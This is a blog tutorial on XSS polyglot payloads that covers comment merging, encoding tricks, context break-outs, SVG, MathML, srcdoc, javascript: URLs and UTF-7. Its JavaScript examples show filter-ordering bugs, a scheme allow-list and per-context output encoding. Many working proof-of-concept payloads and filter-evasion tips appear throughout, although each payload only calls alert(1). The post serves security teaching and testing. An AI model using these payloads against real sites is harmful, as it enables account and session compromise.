DEV Community

Mrhili Mohamed Amine

Creating Powerful XSS Polyglots

Polyglot payloads combine encoding, context-breaking and obfuscation tricks so that a single string is interpreted as live markup or script in more than one context (HTML body, attribute value, JavaScript string, CSS, HTML comment, JSON). They are useful when you do not yet know which context a reflected value lands in, and for probing filters that only understand one of those contexts.

-Merging Comment Styles
Polyglots often confuse parsers by merging comment styles from different languages, so that what is a comment in one context is live code in another:

JavaScript: //, /* */
HTML: <!-- -->

<!--<script>/*--><svg onload=alert(1)/*</script>-->

In an HTML body context the <!-- ... --> pair hides the first half and leaves the <svg onload=...> tag live. Inside a script block the roles flip: JavaScript treats <!-- as a line comment (the Annex B "HTML-like comment"), the /* ... */ pairs become real comments, and </script> ends the block so the HTML parser takes over again. Always confirm the result in a real browser with the console open: if the text that ends up after onload= contains an unterminated /*, the handler body is a syntax error and nothing fires.

-Using Encoded Entities
Bypassing filters using HTML or URL encoding:

HTML: &lt;, &gt;, &quot;
URL: %3C, %3E, %22

&lt;script&gt;alert(1)&lt;/script&gt;

This only works when something decodes the value after the filter has looked at it: the application itself (a blocklist that runs on the raw parameter before the framework decodes it), a second URL-decoding pass, or the browser, which decodes entities inside attribute values (so href="&#106;avascript:alert(1)" is a live javascript: URL). Pasted straight into the HTML body, &lt;script&gt; is rendered as literal text and does nothing.
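The ordering bug that makes the entity trick work, as an added example that is not part of the original post: a hypothetical legacy application runs a blocklist on the raw request parameter and only afterwards URL-decodes and entity-decodes it before writing raw HTML. The hardened variant decodes first and then output-encodes for the HTML body context. The function names, the blocklist pattern and the sample inputs are constructed for this example.

```javascript
// Added example (not from the post): filter-before-decode ordering bug.
// A hypothetical legacy app runs a blocklist on the raw request parameter and
// only afterwards URL-decodes and entity-decodes it before writing raw HTML.

// Decoders standing in for what the *application* does to the value (not the browser).
function percentDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

function decodeHtmlEntities(s) {
  const named = { lt: '<', gt: '>', quot: '"', apos: "'", amp: '&' };
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const ch = named[body.toLowerCase()];
    return ch === undefined ? match : ch;
  });
}

// Hypothetical blocklist: the kind of check that only understands literal markup.
const BLOCKLIST = /<script|<svg|<iframe|javascript:|on[a-z]+\s*=/i;
function blocked(s) { return BLOCKLIST.test(s); }

// Vulnerable ordering: filter the raw value, then decode, then write it into the body.
function renderVulnerable(raw) {
  if (blocked(raw)) return '<p>rejected</p>';
  const value = decodeHtmlEntities(percentDecode(raw));
  return '<p>Search: ' + value + '</p>';
}

// Hardened: canonicalise first so any filter sees what the page will see, then
// rely on output encoding for the HTML body context rather than on the blocklist.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}
function renderHardened(raw) {
  const value = decodeHtmlEntities(percentDecode(raw));
  if (blocked(value)) return '<p>rejected</p>';       // defence in depth, now on the canonical form
  return '<p>Search: ' + escapeHtml(value) + '</p>';
}

// Constructed inputs: the post's entity payload, a percent-encoded svg, and a benign value.
const SAMPLES = [
  '&lt;script&gt;alert(1)&lt;/script&gt;',
  '%3Csvg%20onload%3Dalert(1)%3E',
  'caf%C3%A9 &amp; tea',
];
for (const raw of SAMPLES) {
  console.log(raw, '\n  vulnerable:', renderVulnerable(raw), '\n  hardened:  ', renderHardened(raw));
}
```

Run it with node; the vulnerable renderer emits a live script element for the entity payload while the hardened one either rejects it or, for the benign value, emits it entity-encoded.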

-Multiple Language Contexts
Polyglot payloads work across multiple languages like HTML, JavaScript, CSS.

"><svg onload=alert(1) style="background:url(javascript:alert(1))"><!--

The leading "> closes whatever quoted attribute and tag the input landed in, the svg onload fires, and the trailing <!-- turns the remainder of the original tag into a comment. The CSS part is historical: a url() in a style sheet is a resource fetch, not a navigation, so no current browser runs a javascript: URL there. The onload is the part that executes.

-Breaking Out of Contexts
Escape from the current context before injecting. Inside textarea, title, script, style or xmp the HTML tokenizer treats everything as text until it sees the matching closing tag, so a bare <svg> would be inert there; the closing tag has to come first.

</textarea><svg onload=alert(1)>

-Abusing HTML5 Elements
Using modern elements like <svg>, <iframe>, or <math>, which older blocklists often do not know about.

<svg onload=alert(1)></svg>
<iframe srcdoc="<svg onload=alert(1)>"></iframe>
<math><mtext><script>alert(1)</script></mtext></math>

The math variant works because <mtext> is a MathML text integration point: the parser switches back to HTML rules inside it, so the <script> is an ordinary HTML script element even though it sits inside foreign content.

-Contextual Event Handlers
Inject event handlers into HTML tags like onload, onmouseover.

<div class="x" onmouseover="alert(1)">

Handlers such as onmouseover or onclick need the victim to interact. onload on <svg> or <body>, and onerror on an <img> whose src fails to load, fire as soon as the element is parsed, which matters for stored XSS and for automated scanning.

-Combining HTML, JavaScript, and CSS
Mixing contexts of HTML, CSS, and JavaScript. Here the input lands inside a <style> block: the closing </style> ends the raw-text style content, the script runs, and the trailing <style> swallows whatever CSS followed the injection point so the page does not look broken.

</style><script>alert(1)</script><style>

-Utilizing SVG and XML Features
SVG allows injection via JavaScript URIs and other XML-based features.

<svg><image href="javascript:alert(1)"></svg>

Treat this one as legacy: an <image> href is fetched as an image, not navigated to, so current browsers do not execute a javascript: URL there. Inline SVG still accepts event-handler attributes and <script> children, so <svg onload=alert(1)> or <svg><script>alert(1)</script></svg> are the reliable forms.

-Protocol Confusion (Data URLs, JavaScript URLs)
Use javascript: or data: URLs for payload delivery.

<a href="javascript:alert(1)">Click me</a>

<iframe src="data:text/html;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+"></iframe>

The base64 decodes to <svg onload=alert(1)>. Note the difference in impact: a javascript: link runs in the origin of the page that contains it, whereas a data: document in an iframe gets an opaque origin and cannot read the parent's DOM or cookies. The iframe proves injection but does not by itself hand you the victim's session.

-Breaking with Newline Characters
Using newlines \n or carriage returns \r to bypass filters that look for a handler name followed directly by = and a value, or for the literal string javascript:.

"onmouseover=\nalert(1)//"

The \n stands for an actual 0x0A byte (%0A in a query string). The leading " closes the attribute value the input sits in; the HTML tokenizer then reads onmouseover as a new attribute name, skips the whitespace after = and takes alert(1)//" as the unquoted value, so the handler body is alert(1) followed by a comment. The same trick applies to URLs: browsers strip tab, LF and CR anywhere in a URL before parsing the scheme, so java\nscript:alert(1) is javascript:alert(1).
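A scheme allow-list for href and src sinks that survives the newline and javascript:/data: tricks from the two sections above, as an added example that is not from the original post. It mirrors the clean-up the WHATWG URL parser performs before reading the scheme (tab, LF and CR removed anywhere; leading and trailing C0 controls and spaces stripped). It assumes it is given the already-decoded value that the application will attribute-encode on output; the function names and the candidate URLs are constructed for this example.

```javascript
// Added example (not from the post): scheme allow-list for href/src sinks.
// Mirrors the WHATWG URL parser's pre-processing so "java\nscript:" and
// " javascript:" are judged the same way the browser will judge them.

const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

// What the browser does before it looks for a scheme: drop tab/LF/CR anywhere,
// then trim leading and trailing C0 control characters and spaces.
function normalizeUrl(raw) {
  return String(raw)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
}

// Scheme in lower case, or null when the URL is relative (no "scheme:" prefix).
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Validate the decoded value the application is about to put into href.
// Output still has to be attribute-encoded, so an entity form such as
// &#106;avascript: in the input never reaches the browser decoded.
function isSafeHref(raw) {
  const url = normalizeUrl(raw);
  const scheme = schemeOf(url);
  if (scheme === null) {
    // Relative URL. "//host/..." is scheme-relative and would leave the site.
    return !url.startsWith('//');
  }
  return ALLOWED_SCHEMES.has(scheme);
}

// Constructed inputs covering the tricks from the two sections above.
const CANDIDATES = [
  'https://example.com/docs?page=2',
  '/account/settings',
  'javascript:alert(1)',
  'java\nscript:alert(1)',
  ' \t JaVaScRiPt:alert(1)',
  'data:text/html;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+',
  '//attacker.example/',
];
for (const c of CANDIDATES) {
  console.log(JSON.stringify(c), '->', isSafeHref(c) ? 'allow' : 'block');
}
```

An allow-list on the normalised scheme is the only form of this check that does not decay as new bypasses appear; a blocklist of strings like "javascript:" is exactly what the newline and case variants above are built to slip past.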

-Polyglot Structures
Payloads built around the /* */ comment syntax that JavaScript and CSS share. When input is reflected inside a block comment in a script, the leading */ ends that comment, the code runs, and the trailing /* re-opens a comment so the original */ after the injection point stays valid and the script still parses.

*/ alert(1) /*

-UTF-7 Encoding
Using less common encodings like UTF-7. In UTF-7 the sequence +ADw- is < and +AD4- is >, so the payload contains no angle brackets for a filter to match:

+ADw-script+AD4-alert(1)+ADw-/script+AD4-

This is a historical vector. It relied on the page not declaring a charset and on the browser (older Internet Explorer) sniffing the encoding; current browsers no longer decode UTF-7 at all. It is still worth knowing when a response's charset is missing or attacker-controlled, and it is the standard argument for always sending an explicit charset in Content-Type.
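A minimal UTF-7 encoder and decoder, added here to show the mechanics of the payload above; it is not code from the post. The encoder produces the same +ADw- and +AD4- sequences, and the decoder does what a charset-sniffing client of the IE era did before handing the text to the HTML parser. RFC 2152 Set D plus space and line breaks are taken as directly encodable characters, an assumption of this example; everything else is base64-encoded.

```javascript
// Added example (not from the post): minimal UTF-7 codec (RFC 2152).
// "+" opens a run of modified base64 (UTF-16BE code units, no padding),
// "-" closes it, and "+-" stands for a literal "+".

const B64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
// Characters written as themselves: RFC 2152 Set D plus space and line breaks.
// Everything else (including < > " & = from Set O) is base64-encoded, which is
// exactly what hides the angle brackets of the payload from a naive filter.
const DIRECT = /[A-Za-z0-9'(),\-.\/:? \r\n]/;

function utf7Encode(s) {
  let out = '';
  let i = 0;
  while (i < s.length) {
    if (s[i] === '+') { out += '+-'; i++; continue; }
    if (DIRECT.test(s[i])) { out += s[i]; i++; continue; }
    let bits = 0, nbits = 0, enc = '';
    while (i < s.length && s[i] !== '+' && !DIRECT.test(s[i])) {
      bits = (bits << 16) | s.charCodeAt(i);   // one UTF-16 code unit per character
      nbits += 16;
      while (nbits >= 6) { nbits -= 6; enc += B64[(bits >> nbits) & 63]; }
      bits &= (1 << nbits) - 1;
      i++;
    }
    if (nbits > 0) enc += B64[(bits << (6 - nbits)) & 63];  // flush, zero-padded, no "="
    out += '+' + enc + '-';
  }
  return out;
}

function utf7Decode(s) {
  let out = '';
  let i = 0;
  while (i < s.length) {
    if (s[i] !== '+') { out += s[i]; i++; continue; }
    i++;
    if (s[i] === '-') { out += '+'; i++; continue; }
    let bits = 0, nbits = 0;
    while (i < s.length && B64.indexOf(s[i]) !== -1) {
      bits = (bits << 6) | B64.indexOf(s[i]);
      nbits += 6;
      if (nbits >= 16) {
        nbits -= 16;
        out += String.fromCharCode((bits >> nbits) & 0xffff);
        bits &= (1 << nbits) - 1;
      }
      i++;
    }
    if (s[i] === '-') i++;   // the terminator is absorbed, not emitted
  }
  return out;
}

const PAYLOAD = '+ADw-script+AD4-alert(1)+ADw-/script+AD4-';
console.log(utf7Decode(PAYLOAD));           // what a UTF-7-sniffing client would parse
console.log(utf7Encode('<script>alert(1)</script>') === PAYLOAD);
```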

-Using HTML5 Injection Vectors
Use modern HTML5 attributes like srcdoc or formaction. srcdoc is especially useful: its content is parsed as a full document that shares the parent page's origin (unlike a data: URL), so a script inside it is a real XSS, and because attribute values are entity-decoded before that document is parsed, srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;" works too. formaction on a submit button overrides the target of the enclosing form. sandbox is the defensive counterpart: an iframe with sandbox and without allow-scripts runs none of this.

<iframe srcdoc="<script>alert(1)</script>"></iframe>

-Multiple Closings & Layering
Close different tags to break out of nested contexts. Each closing tag that does not apply to the current context is ignored by the HTML parser as a stray end tag, so stacking several lets one string escape textarea, script and iframe sinks alike.

</textarea></script></iframe><svg onload=alert(1)>
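To see the break-outs from the Merging Comment Styles, Breaking Out of Contexts, Combining HTML/JavaScript/CSS and this section side by side, and what stops them, here is an added example that is not part of the original post. The post's payloads are rendered into five hypothetical sink templates, first with naive concatenation and then with per-context output encoding, and a coarse check counts whether the raw delimiters that end each context (a bare <, a double quote, -->, </) survive into the output. The templates, the encoder names and the check itself are constructed for this example.

```javascript
// Added example (not from the post): the same payloads rendered into several
// hypothetical sinks with naive concatenation and with per-context encoding.

// Payloads quoted from the sections above.
const PAYLOADS = [
  '<!--<script>/*--><svg onload=alert(1)/*</script>-->',
  '"><svg onload=alert(1)><!--',
  '</style><script>alert(1)</script><style>',
  '</textarea></script></iframe><svg onload=alert(1)>',
];

// Constructed templates, one per context; $INPUT marks where the value lands.
const TEMPLATES = {
  body:      '<p>Hello $INPUT</p>',
  attribute: '<input value="$INPUT">',
  textarea:  '<textarea>$INPUT</textarea>',
  comment:   '<!-- last search: $INPUT -->',
  jsString:  '<script>var q = "$INPUT";</script>',
};

// Per-context encoders. The context of the sink, not the content, picks the encoder.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}
// Inside a comment entities are not decoded, so the only thing that matters is that
// no "--" (and hence no "-->" or "--!>") can be formed.
function escapeComment(s) {
  return escapeHtml(s).replace(/-/g, '&#45;');
}
// Inside a JS string literal in a <script>: \xHH / \uHHHH everything that is not
// alphanumeric or space, which also neutralises "</script>" for the HTML tokenizer.
function escapeJsString(s) {
  return s.replace(/[^A-Za-z0-9 ]/gu, c => {
    const cp = c.codePointAt(0);
    if (cp < 0x100) return '\\x' + cp.toString(16).padStart(2, '0');
    if (cp < 0x10000) return '\\u' + cp.toString(16).padStart(4, '0');
    return '\\u{' + cp.toString(16) + '}';
  });
}

const UNSAFE = Object.fromEntries(Object.keys(TEMPLATES).map(k => [k, s => s]));
const SAFE = {
  body: escapeHtml, attribute: escapeHtml, textarea: escapeHtml,
  comment: escapeComment, jsString: escapeJsString,
};

function render(ctx, value, encoders) {
  // function replacer so "$&"-style patterns in the payload are not expanded
  return TEMPLATES[ctx].replace('$INPUT', () => encoders[ctx](value));
}

// Coarse break-out check: for each context, the raw delimiters that would end it.
// If the output contains more of them than the template itself, the input escaped.
const DELIMS = {
  body: /</g,
  textarea: /</g,
  attribute: /["<]/g,
  comment: /--!?>/g,
  jsString: /"|<\/|[\r\n\u2028\u2029]/g,
};
function escapedSink(ctx, output) {
  const count = s => (s.match(DELIMS[ctx]) || []).length;
  return count(output) > count(TEMPLATES[ctx]);
}

// Returns { context: true|false }: true if any payload broke out under these encoders.
function audit(encoders) {
  const result = {};
  for (const ctx of Object.keys(TEMPLATES)) {
    result[ctx] = PAYLOADS.some(p => escapedSink(ctx, render(ctx, p, encoders)));
  }
  return result;
}

console.log('naive concatenation:', audit(UNSAFE));
console.log('context-aware encoding:', audit(SAFE));
```

The delimiter count is a smoke test, not a proof: it is enough to show that every payload above escapes every naive sink and none escapes the encoded ones, but real verification means loading the rendered page in a browser. Note also that there is no encoder that makes arbitrary input safe inside a <style> block or a raw JavaScript code position; those sinks should not take untrusted data at all.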

Best Practices for Polyglot Payloads
Diversify Attack Vectors: Use several elements, such as svg, iframe and script, so that a blocklist that misses one of them still lets another through.
Encoding: Use HTML or URL encoding where something decodes the value after the filter has run.
Event Handlers: Combine with event handlers like onmouseover, onload.
Context Escaping: Focus on breaking out of strings, attributes, or tags before the payload itself.
Minimize Payload Length: Keep payloads short to bypass length restrictions.
These techniques show how polyglot payloads can bypass filters that understand only one language or context; the durable defence is context-aware output encoding at each sink rather than a blocklist on input.
